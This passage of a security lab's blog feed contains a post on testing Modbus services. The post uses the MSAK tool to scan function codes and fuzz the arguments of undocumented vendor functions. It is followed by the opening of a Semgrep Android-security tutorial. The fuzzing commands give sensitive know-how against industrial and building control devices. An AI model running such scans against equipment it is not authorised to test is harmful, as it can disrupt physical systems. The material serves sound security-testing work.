tag:blogger.com,1999:blog-71227457632346602832024-03-18T05:41:40.815-07:00IMQ Minded Security BlogIMQ Minded Security Research LabsMinded Securityhttp://www.blogger.com/profile/01503616812076743415noreply@blogger.comBlogger105125tag:blogger.com,1999:blog-7122745763234660283.post-30032703815752707092024-03-06T08:56:00.000-08:002024-03-06T08:58:35.486-08:00Testing the Security of Modbus Services<p></p>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right;">
<tbody>
<tr>
<td style="text-align: center;">
<span style="font-size: medium;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjtPDsHTU_40xbA4tMMARNyxJZu0USyUlzoYEpX4CYah14yXlEVLZR6z1N-Hyjiymo4za3D_cURAyM0or3FtLoEONbj-BUp3d3aJJcJxoxgoZmG2n5U93cHXZCaa0mFa0csDUlVtiOl68jsL-58f4rl2wiZCXoQRo-I059Xd76Ekjct9y6vq9JydE1i4/s569/BMS_ModBus.png" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img data-original-height="569" data-original-width="532" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjtPDsHTU_40xbA4tMMARNyxJZu0USyUlzoYEpX4CYah14yXlEVLZR6z1N-Hyjiymo4za3D_cURAyM0or3FtLoEONbj-BUp3d3aJJcJxoxgoZmG2n5U93cHXZCaa0mFa0csDUlVtiOl68jsL-58f4rl2wiZCXoQRo-I059Xd76Ekjct9y6vq9JydE1i4/w299-h320/BMS_ModBus.png" style="border: 0pt 0pt 0pt 0pt;" width="299" /></a>
</span></td>
</tr>
<tr>
<td class="tr-caption" style="text-align: center;"></td>
</tr>
</tbody>
</table>
<span style="font-size: medium;"><br /></span><p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">ICS and Building Management Systems (BMS) support several protocols such as
<i><b>Modbus</b></i>, <i>Bacnet</i>, <i>Fieldbus</i> and so on. Those protocols were designed to provide read/write control over sensors and actuators from a central point.
</span></p><p style="text-align: left;"></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
Driven by our past experience with BMS, we decided to release
our own methodology and internal tool used for proactive attack surface
analysis within systems supporting the Modbus protocol.
</span></p>
<h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">The Modbus Protocol</span></h3>
<p style="text-align: left;">
<span style="font-family: verdana; font-size: medium;"><a href="https://en.wikipedia.org/wiki/Modbus" target="_blank">Modbus</a> is a
well defined protocol described on
<a href="https://modbus.org/specs.php" target="_blank">modbus.org</a>. It
was created in 1979 and has become one of the most used standards for
communication between industrial electronic devices in a wide range of buses
and network.
</span></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
It can be used over a variety of communication media, including serial, TCP,
UDP, etc..
</span></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
The application part of the protocol is quite simple. In particular, the part
we are interested into is its Protocol Data Unit, which is independent from
the lower layer protocols, is defined as follows:
</span></p>
<p style="text-align: center;"></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;"></span></p><blockquote><span style="font-family: verdana; font-size: medium;">| FUNCTION CODE | DATA |</span></blockquote><p></p>
<p style="text-align: left;"></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
Where <i>FUNCTION CODE</i> is a
<i>1 Byte size 0-127 (0x00-0x7F) value</i>, and <i>DATA</i> is a sequence
of bytes that changes according to the function code.
</span></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
Here is a set of function codes already defined by the protocol specification:
</span></p>
<p></p>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: verdana; font-size: medium;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiQLA-21SSyWWIjvhqq8WGpypkbuMO8Lk2S2jR8gcPsRaWTNu17-hP15qWqsLp_xivwrZ6LsCC7MUw9xd_VWoxbviIz-IXhnl5uikmO5rcyReEBFT_fUCS8FhdKCSc5MrdCZzNi2XHKu77uklyvKDxZ91rDsVnySjSJDn0-7EURHqQLAHg40DIXXZuQjgk" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="675" data-original-width="996" height="434" src="https://blogger.googleusercontent.com/img/a/AVvXsEiQLA-21SSyWWIjvhqq8WGpypkbuMO8Lk2S2jR8gcPsRaWTNu17-hP15qWqsLp_xivwrZ6LsCC7MUw9xd_VWoxbviIz-IXhnl5uikmO5rcyReEBFT_fUCS8FhdKCSc5MrdCZzNi2XHKu77uklyvKDxZ91rDsVnySjSJDn0-7EURHqQLAHg40DIXXZuQjgk=w640-h434" width="640" /></a>
</span></div>
<span style="font-family: verdana; font-size: medium;"><br />
</span><p><span style="font-family: verdana; font-size: medium;">
By setting a specific function code together with its expected set of data
field values, it will be possibile to read/write the status of coils, inputs
and registers, or access information about other interesting aspects such as
diagnostic data.
</span></p>
<p><span style="font-family: verdana; font-size: medium;">
For example the following request, queries about the status of 2 <span style="background-color: white;">coils starting from address 0x0033 in a remote device:</span>
</span></p>
<p><span style="background-color: white; font-family: verdana; font-size: medium;"></span></p>
<blockquote><span style="font-family: verdana; font-size: medium;"> \x01\x01\x00\x33\x00\x02 </span></blockquote>
<p></p>
<p><span style="background-color: white; font-family: verdana; font-size: medium;">Where:</span></p>
<p><span style="background-color: white; font-family: verdana; font-size: medium;"></span></p>
<blockquote><span style="font-family: verdana; font-size: medium;">
| \x01 [<b>SlaveId</b>] | \x01 [<b>Function Code</b>] | \x00\x33 [<b>Address</b>] | \x00\x02
[<b>Quantity</b>] |
</span></blockquote>
<p></p>
<p>
<span style="font-family: verdana; font-size: medium;"><span style="background-color: white;"><br /></span>
</span></p>
<p>
<span style="font-family: verdana; font-size: medium;"><span style="background-color: white;">As it can be noticed, that is quite similar to an API based moder</span>n application, the name of the function and its arguments:
</span></p>
<p></p>
<blockquote><i><span style="font-family: verdana; font-size: medium;">Protocol://URL/<b>EndPoint</b>?<b>Parameters</b>=<b>Values</b>..</span></i></blockquote>
<p><span style="font-family: verdana; font-size: medium;">
Apart from the public function codes, several codes are left as<i> custom
implementation</i> and are <u>reserved</u> but not defined in the standard.
</span></p>
<p></p>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: verdana; font-size: medium;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjZ23-p_YeYWL_smGaf6c6V9an46z_1Ge0MA9aKlLurjF3xoXaAK427syK0rS9ZeaQ25iUo8izatZkG8YZRF4gALEmVrQgRYItHPC_Q0YtoajS8vdQGr6oD_MvYIYN5tcO1jrn9RhmmCnMgyX4Ii0l33K9BBs-CgxJ2An51det1A2Qc-lLipjKWxyoxGU8" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="390" data-original-width="368" height="320" src="https://blogger.googleusercontent.com/img/a/AVvXsEjZ23-p_YeYWL_smGaf6c6V9an46z_1Ge0MA9aKlLurjF3xoXaAK427syK0rS9ZeaQ25iUo8izatZkG8YZRF4gALEmVrQgRYItHPC_Q0YtoajS8vdQGr6oD_MvYIYN5tcO1jrn9RhmmCnMgyX4Ii0l33K9BBs-CgxJ2An51det1A2Qc-lLipjKWxyoxGU8=w302-h320" width="302" /></a>
</span></div>
<span style="font-family: verdana; font-size: medium;"><br />
</span><div style="text-align: left;"><span style="font-family: verdana; font-size: medium;"><br /></span></div><div style="text-align: left;"><span style="font-family: verdana; font-size: medium;">
In particular <i>65-72 (0x41-0x48)</i>, and
<i>100-110 (0x64-0x6e), for a total of 19 </i>function codes, are left to
the vendor/manufacturer for custom implementations.</span></div><div style="text-align: left;"><span style="font-size: medium;"><span style="font-family: verdana;"><br />
</span><span style="font-family: verdana;">While some of the vendors make the specification of custom functions, publicly available, with all the
expected arguments and formats, in their manuals, others do not release any information.<br />
</span><span style="font-family: verdana;">From a security tester point of view, first questions are:</span></span></div>
<p style="text-align: left;"></p><p style="text-align: left;"></p><p style="text-align: left;"></p><ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;">
How can we identify if a <i><b>custom</b></i> Function Code <b>is implemented</b> but no details
are available?
</span></li></ul><ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;">How can we find the correct set of <i><b>expected arguments</b></i>?</span></li></ul><ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;">How can we <i><b>fuzz the arguments</b></i> to find security issues?</span></li></ul><p></p><p></p><p></p>
<div>
<p style="text-align: left;"></p>
<h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">Modbus Attack Surface</span></h3>
<div style="text-align: left;"><span style="font-family: verdana; font-size: medium;">As defined by the standard, if the client request presents some error the slave response will trigger specific exception codes:</span></div>
<p></p>
<blockquote><span style="font-family: verdana; font-size: medium;">
| 0x80 + [Request Function Code] | 0xHH [<b><i>Exception Code</i></b>] | ... |
</span></blockquote>
<p></p>
<p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">Where exceptions code are the following:</span></p>
<div class="separator" style="clear: both; text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: verdana; font-size: medium;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiNhvXjVFuK6QIlpa5EdJvjIyS6oXInfqyPetjnj5yBzlZRq7i-tXFZ5ZcXXEB2s0XUTV5-BZoEk_0-YM4ZCveW3yg8I4n-khbZ3-QDDzrgMAphIgKUTMsmMZfvSlZeCB703j23fc2CtyB8g72oBSSIuRHXc-FulSo5a88TckEToYYvf9rSNGIrnw5S23Y" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="630" data-original-width="771" height="523" src="https://blogger.googleusercontent.com/img/a/AVvXsEiNhvXjVFuK6QIlpa5EdJvjIyS6oXInfqyPetjnj5yBzlZRq7i-tXFZ5ZcXXEB2s0XUTV5-BZoEk_0-YM4ZCveW3yg8I4n-khbZ3-QDDzrgMAphIgKUTMsmMZfvSlZeCB703j23fc2CtyB8g72oBSSIuRHXc-FulSo5a88TckEToYYvf9rSNGIrnw5S23Y=w640-h523" width="640" /></a>
</span></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: verdana; font-size: medium;"><br /></span></div>
</div>
<div><span style="font-family: verdana; font-size: medium;"><br /></span></div><p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">This behavior can help when testing and identifying the exposed services.</span></p><p style="text-align: left;"><span style="font-family: verdana;"><span style="font-size: medium;">In particular, the first three exceptions will help identifying the presence
of a custom function code.</span></span></p><ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;"><b>0x01 Unimplemented Function</b>: Function does not exist in the present status.</span></li></ul><ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;"><b>0x02 Function Implemented but address is not correct</b>: Function exists but address is wrong.</span></li></ul><ul style="text-align: left;"><li><span style="font-family: verdana; font-size: medium;"><b>0x03 Function Implemented but the arguments are not correct</b>: Function exists but provided arguments are wrong.</span></li></ul><p></p>
<p></p>
<div><span style="font-family: verdana; font-size: medium;">As you may already guessed <i>0x02</i> and <i>0x03</i> responses do actually reveal the presence of a custom function!</span></div><div><span style="font-family: verdana; font-size: medium;">On the other hand<i> 0x01</i> does not mean that there's no custom implementation for that requested function but just that it's not available for the status of the device and it will require some more analysis effort.</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div>
<p></p>
<h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">The Methodology</span></h3>
<p><span style="font-family: verdana; font-size: medium;">
Apart from public function codes, where it would be quite easy to check for
read/write access to data, we want to identify if there's a set of
implemented custom function codes on a black box system.
</span></p>
<p><span style="font-family: verdana; font-size: medium;">According to the response, we'll identify if a function code
is implemented by analyzing the response for each required function code:
</span></p>
<blockquote><p><span style="font-family: verdana; font-size: medium;">for code in function_codes:</span></p><p><span style="font-family: verdana; font-size: medium;"><br /></span></p><p><span style="font-family: verdana; font-size: medium;">resp = send(code)</span></p><p><span style="font-family: verdana; font-size: medium;">if has_exception(resp):</span></p><p><span style="font-family: verdana; font-size: medium;"> switch(exception(resp)):</span></p><p><span style="font-family: verdana; font-size: medium;"> case 0x01: # UNIMPLEMENTED Function Error</span></p><p><span style="font-family: verdana; font-size: medium;"> #Function does not Exist (maybe)! </span></p><p><span style="font-family: verdana; font-size: medium;"> break;</span></p><p><span style="font-family: verdana; font-size: medium;"> case 0x02: # Invalid Address Error</span></p><p><span style="font-family: verdana; font-size: medium;"> #Function Exists ! </span></p><p><span style="font-family: verdana; font-size: medium;"> break;</span></p><p><span style="font-family: verdana; font-size: medium;"> case 0x03: # Invalid Data Error</span></p><p><span style="font-family: verdana; font-size: medium;"> #Function Exists ! </span></p><p><span style="font-family: verdana; font-size: medium;"> break;</span></p><p><span style="font-family: verdana; font-size: medium;"> default: # other codes..</span></p><p><span style="font-family: verdana; font-size: medium;"> break;</span></p></blockquote><p><span style="font-family: verdana; font-size: medium;"><br /></span></p><p><span style="font-family: verdana; font-size: medium;">the previous pseudo code shows the approach we use to identify if a custom function is implemented and where we should fuzz.</span></p>
</div>
<div>
<h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">The Tool</span></h3>
<div><span style="font-family: verdana; font-size: medium;">Here comes <a href="https://github.com/mindedsecurity/msak" target="_blank">M-SAK (the Modbus Swiss Army Knife)</a>, a pretty useful command line and library which can help for scanning and identifying custom functions on a Modbus device.</span></div><div><span style="font-family: verdana; font-size: large;">MSAK is a tool written in Python to help discovering and testing exposed standard and custom services of Modbus Servers/Slaves over Serial or TCP/IP connections. </span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">It also offers a highly customizable payload generator that will help the tester to perform complex scans using a simple but powerful templating format.</span></div><div><span style="background-color: #fcff01; font-family: verdana; font-size: medium;"><br /></span></div><div><span style="background-color: white; font-family: verdana; font-size: medium;">MSAK can help in:</span></div><div><span style="background-color: white; font-family: verdana; font-size: medium;">- <i><b>finding</b> undocumented functions</i> </span></div><div><span style="background-color: white; font-family: verdana; font-size: medium;">- <b><i>fuzzing</i></b> <i>the arguments</i> in order to find security issues or weird behavior.</span></div><div><span style="background-color: white; font-family: verdana; font-size: medium;"><br /></span></div><div><span style="background-color: white;"><span style="font-family: verdana; font-size: medium;"><span>For example if we want to scan all function we can just use the Service Scan option, which will</span></span></span><span style="font-family: verdana; font-size: large;"> scan all functions codes [1-127] using the given payload and then will print a summary grouped by response:</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><blockquote><div><div><span style="font-family: verdana; font-size: medium;"> $ python3 msak.py -S -d '0001'</span></div><div><span style="font-family: verdana; font-size: medium;">Requested Data \x01\x01\x00\x01\x91\xD8</span></div><div><span style="font-family: verdana; font-size: medium;">..</span></div><div><span style="font-family: verdana; font-size: medium;">Requested Data \x01\x02\x00\x01\x91\xD8</span></div><div><span style="font-family: verdana; font-size: medium;">..</span></div><div><span style="font-family: verdana; font-size: medium;">Requested Data \x01\x03\x00\x01\x91\xD8</span></div><div><span style="font-family: verdana; font-size: medium;">...</span></div><div><span style="font-family: verdana; font-size: medium;">Requested Data \x01\x64\x00\x01\x91\xD8</span></div><div><span style="font-family: verdana; font-size: medium;">...</span></div><div><span style="font-family: verdana; font-size: medium;">ILLEGAL DATA VALUE<span style="white-space: pre;"> </span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>1 (0x01) Read Coils [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>2 (0x02) Read Discrete Inputs [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>3 (0x03) Read Holding Registers [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>4 (0x04) Read Input Registers [FUN_ID|ADDRESS|TOTAL NUMBER| >BHH]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>15 (0x0F) Write Multiple Coils [FUN_ID|ADDRESS|TOTAL NUM|BYTE COUNT|BYTE VALS >BHHBN*B]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>16 (0x10) Write Multiple registers [FUN_ID|ADDRESS|TOTAL NUM|BYTE COUNT|VALS >BHHBN*H]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>20 (0x14) Read File Record</span></span></div><div><span style="font-family: verdana; font-size: medium;">ACCEPTED_WITH_RESPONSE<span style="white-space: pre;"> </span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>5 (0x05) Write Single Coil [FUN_ID|ADDRESS|COIL VALUE| >BHH]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>6 (0x06) Write Single Register [FUN_ID|ADDRESS|REG VALUE| >BHH]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>17 (0x11) Report Server ID (Serial Line only) [FUN_ID >B]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>105 CUSTOM</span></span></div><div><span style="font-family: verdana; font-size: medium;">ILLEGAL FUNCTION<span style="white-space: pre;"> </span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>7 (0x07) Read Exception Status (Serial Line only) [FUN_ID >B]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>8 (0x08) Diagnostics (Serial Line only) [|FUN_ID|SUB_FUN|VALUES| >BHN*H]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>9 CUSTOM</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>10 CUSTOM</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>11 (0x0B) Get Comm Event Counter (Serial Line only) [FUN_ID >B]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>12 (0x0C) Get Comm Event Log (Serial Line only)[FUN_ID >B]</span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>13 CUSTOM</span></span></div><div><span style="font-family: verdana; font-size: medium;">....</span></div><div><span style="font-family: verdana; font-size: medium;">ILLEGAL DATA ADDRESS<span style="white-space: pre;"> </span></span></div><div><span style="white-space: normal;"><span style="font-family: verdana; font-size: medium;"><span style="white-space: pre;"> </span>21 (0x15) Write File Record</span></span></div></div></blockquote><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><p style="text-align: left;"><span style="font-family: verdana; font-size: medium;">The result shows that a custom function 0x69 (105) was found as the device responded with a 0x03 exception (Illegal data value). We can now try to find the correct set of arguments through fuzzing using the following command: </span></p><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><blockquote><div><span style="font-family: verdana; font-size: medium;">$ python3 msak.py -C -d '0169{R[0,0xFF,">H"]}'</span></div></blockquote><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">Which will send 0 to 65535 requests and collect the responses.</span></div><div><span style="font-family: verdana; font-size: medium;">In fact:</span></div><div><span style="font-family: verdana; font-size: medium;">- 0x01 is the slave ID</span></div><div><span style="font-family: verdana; font-size: medium;">- 0x69 is the service function</span></div><div><span style="font-family: verdana; font-size: medium;">- R[0,0xFF,">H"] asks to generate 0-65535 sequence of payloads in for a 2 Bytes, little endian format.</span></div><div><span style="font-family: verdana; font-size: medium;">- the request will be via serial port and the CRC are automatically computed.</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">After the whole scan, MSAK will return an output similar to the following:</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><blockquote><div><div><span style="font-family: verdana; font-size: medium;">{</span></div><div><span style="font-family: verdana; font-size: medium;">'NO_RESPONSE':</span></div><div><span style="font-family: verdana; font-size: medium;"> [ ... </span></div><div><span style="font-family: verdana; font-size: medium;"> b'\x01\x69\x36\xfe',</span></div><div><span style="font-family: verdana; font-size: medium;"> ...</span></div><div><span style="font-family: verdana; font-size: medium;"> ], </span></div><div><span style="font-family: verdana; font-size: medium;">'ACCEPTED_WITH_RESPONSE': </span></div><div><span style="font-family: verdana; font-size: medium;"> [ b'\x01\x69\x36\xff', </span></div><div><span style="font-family: verdana; font-size: medium;"> b'\x01\x69\x37\x00',</span></div><div><span style="font-family: verdana; font-size: medium;">...</span></div><div><span style="font-family: verdana; font-size: medium;"> ]</span></div><div><span style="font-family: verdana; font-size: medium;">}</span></div></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div></blockquote></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">We have found that the undocumented function responds to arguments values of \x36\xff and \x37\x00! </span></div><div><span style="font-family: verdana; font-size: medium;">Next step is to play with this new function and see if there's some way to abuse it...</span></div><div><span style="font-family: verdana; font-size: medium;">What could go wrong if an undocumented function for firmware update is found, right?! :P </span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">For more information, the fuzzing engine support several template patterns documented on MSAK <a href="https://github.com/mindedsecurity/msak?tab=readme-ov-file#custom-scan" target="_blank">README</a> file.</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">N.B.: The fuzzing template engine is available also as a separate python library called <a href="https://github.com/mindedsecurity/simple_payload_generator">Simple Payload Generator</a>.</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><h3 style="text-align: left;"><span style="font-family: verdana; font-size: large;">Conclusions</span></h3>
<div><span style="font-family: verdana; font-size: medium;">Although Modbus is a quite old protocol, it's still used on Build Management Systems, Industrial Control Systems and SCADA Systems. </span></div><div><span style="font-family: verdana; font-size: medium;">Apart from dealing using well defined functionalities, to read/write sensors and controls, which could lead to very interesting security issues, the standard leaves pretty much space to vendors for implementing their own services and that might be even more interesting from a security point of view!</span></div><div><span style="font-family: verdana; font-size: medium;">That's where MSAK can give its best by automating the boring part and leave all the fun to the tester!</span></div><div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><span style="font-family: verdana; font-size: medium;">Feel free to send us your feedback and happy hacking!</span></div>
<div><span style="font-family: verdana; font-size: medium;"><br /></span></div><div><b style="font-family: verdana; font-size: large;">Author</b><span style="font-family: verdana; font-size: large;">: Stefano Di Paola </span></div>
<div><span style="font-family: verdana; font-size: medium;"><b>Twitter</b>: <a href="https://twitter.com/wisecwisec" target="_blank">@WisecWisec</a> </span></div>
</div>
Stefano Di Paolahttp://www.blogger.com/profile/11966634329749157589noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-34271563726921689972023-10-23T00:32:00.001-07:002024-01-31T06:47:52.864-08:00Semgrep Rules for Android Application Security<!--Library for hilighting-->
<link href="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.8.0/build/styles/nord.min.css" rel="stylesheet"></link>
<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.8.0/build/highlight.min.js"></script>
<!--and it's easy to individually load additional languages-->
<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.8.0/build/languages/go.min.js"></script>
<h2 style="text-align: left;">Introduction</h2><p></p><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmqKNYmEPnpcNBEXzKE7L9L8Z3vMbGd70W0XIXLj48ru63EH1VB_Jlv5DF2vctrykGOBv9H9Ob_08OxOzPDNFJx6IBD1mTpbNOA5Pza7mJEv1D4GciPW8dLxEVMMNWAjOQ70RlNYmwJMhpP-Z08X-4yXe61CtZW6x9NXbqPqNDCQgiOJcIzZmGWLTarQU/s1024/android_image.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="1024" data-original-width="1024" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmqKNYmEPnpcNBEXzKE7L9L8Z3vMbGd70W0XIXLj48ru63EH1VB_Jlv5DF2vctrykGOBv9H9Ob_08OxOzPDNFJx6IBD1mTpbNOA5Pza7mJEv1D4GciPW8dLxEVMMNWAjOQ70RlNYmwJMhpP-Z08X-4yXe61CtZW6x9NXbqPqNDCQgiOJcIzZmGWLTarQU/w308-h308/android_image.png" width="308" /></a></div>The number of Android applications has been growing rapidly in recent years. In 2022, there were over <b>3.55 million</b> <b>Android apps</b> available in the Google Play Store, and this number is expected to continue to grow in the years to come. The expansion of the Android app market is being driven by a number of factors, including the increasing popularity of smartphones, the growing demand for mobile apps, and the ease of developing and publishing Android apps. At the same time, the number of Android app<br /> downloads is also growing rapidly. In 2022, there were over <b>255 billion</b> Android app <b>downloads</b> worldwide.<p></p><p>For this reason, introducing automatic security controls during Mobile Application Penetration Testing (MAPT) activity and the CI phase is necessary to ensure the security of Android apps by scanning for vulnerabilities before merging into the main repository.</p><h2 style="text-align: left;"><br /></h2><h2 style="text-align: left;">Decompiling Android Packages</h2><p>The compilation of Android applications is a multi-step process that involves different bytecodes, compilers, and execution engines. Generally speaking, a common compilation flow is divided into three phases:</p><p></p><ol style="text-align: left;"><li><b>Precompilation</b>:<span style="font-weight: bold;"> </span>The Java source code(".java") is converted into Java bytecode(".class").</li><li><b>Postcompilation</b>: The Java bytecode is converted into Dalvik bytecode(".dex").</li><li><b>Release</b>: The ".dex" and resource files are packed, signed and compressed into the Android App Package (<b>APK</b>)</li></ol><p></p><p>Finally, the Dalvik bytecode is executed by the Android runtime (ART) environment.</p><p>Generally, the target of a Mobile Application Penetration Testing (MAPT) activity is in the form of an APK file. The decompilation of the both aforementioned bytecodes is possible and can be performed through the use of tools such as <a href="https://github.com/skylot/jadx" target="_blank">Jadx</a>.</p>
<pre><code style="border-radius: 10px;">jadx -d ./out-dir target.apk</code></pre>
<p></p><h2 style="text-align: left;"><br /></h2><h2 style="text-align: left;">OWASP MAS</h2><div><div>The <a href="https://mas.owasp.org/" target="_blank">OWASP MAS</a> project is a valuable resource for mobile security professionals, providing a comprehensive set of resources to enhance the security of mobile apps. The project includes several key components:</div><div><ul style="text-align: left;"><li><b>OWASP MASVS</b>: This resource outlines requirements for software architects and developers who aim to create secure mobile applications. It establishes an <b>industry standard</b> that can be used as a benchmark in mobile app security assessments. Additionally, it clarifies the role of software protection mechanisms in mobile security and offers requirements to verify their effectiveness.</li></ul><ul style="text-align: left;"><li><b>OWASP MASTG</b>: This comprehensive manual covers the processes, techniques, and tools used during mobile application security analysis. It also includes an exhaustive set of <b>test cases</b> for verifying the requirements outlined in the OWASP Mobile Application Security Verification Standard (MASVS). This serves as a foundational basis for conducting thorough and consistent security tests.</li></ul><ul style="text-align: left;"><li><b>OWASP MAS Checklist</b>: This checklist aligns with the tests described in the MASTG and provides an output template for mobile security testing.</li></ul></div></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><span style="margin-left: auto; margin-right: auto;"><a href="goog_142454313"><img alt="OWASP MAS" border="0" data-original-height="448" data-original-width="1171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdKu4Zh5wr5AX_VDzDIKJ4OxF1_nfAY0N6KYHhjv5tHJzptABxQ_5QcPgBu4VbmBWRO8NAy6PrDN_z8kwF_WTkCbabyQF1Kuvm8Vb9f9ywXGm9xfyyFACFGlWFTRRU1eNn9PQ8sV1IdAffzkQmGVc0cfPxyYyqsXOWD5qnCi4cjtn4WyKCW6xXcxOnuA/s16000/owasp_mas.png" /></a></span></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://mas.owasp.org/">https://mas.owasp.org/</a></td></tr></tbody></table><h2 style="text-align: left;"><br /></h2><h2 style="text-align: left;">Semgrep</h2><p style="text-align: left;"><a href="https://semgrep.dev/" target="_blank">Semgrep</a> is a Static Application Security Testing (SAST) tool that performs <b>intra-file analysis</b>, allowing you to define code patterns for detecting misconfigurations or security issues by analyzing one file at a time in isolation. Some advantages of using Semgrep include:</p><div><div><ul><li>It does not require that the source code is uploaded to an external cloud.</li><li>It does not require that the target source code is buildable and have all dependencies. It can work only with a single source file.</li><li>It is exceptionally <b>fast</b>.</li><li>It allows you to write your <b>custom patterns</b> very easily.</li></ul></div><div>Once Semgrep is integrated into your <b>CI pipeline</b>, it automatically scans your code for potential vulnerabilities every time you commit changes. This helps identify and address vulnerabilities early in the development process, improving your software's security.</div></div><div><br /></div><div><h4>Key Insights on Semgrep</h4><div><div><div>First of all, install Semgrep with the following command:</div><div><pre><code style="border-radius: 10px;">python3 -m pip install semgrep</code></pre></div><div>Semgrep accepts two fundamental input:</div><div><ul style="text-align: left;"><li><b>Rules collection</b>: A collection is composed by ".yaml" files, alternatively referred to as "rules". A rule includes a series of patterns designed to identify or exclude specific elements within the target source code.</li><li><b>Target source code</b>: This denotes the source code subject to analysis. It may also encompass partial code or code with certain dependencies omitted.</li></ul></div></div><div>The four main elements you can find inside a <a href="https://semgrep.dev/docs/writing-rules/pattern-syntax/" target="_blank">Semgrep rule </a>yaml file are:</div>
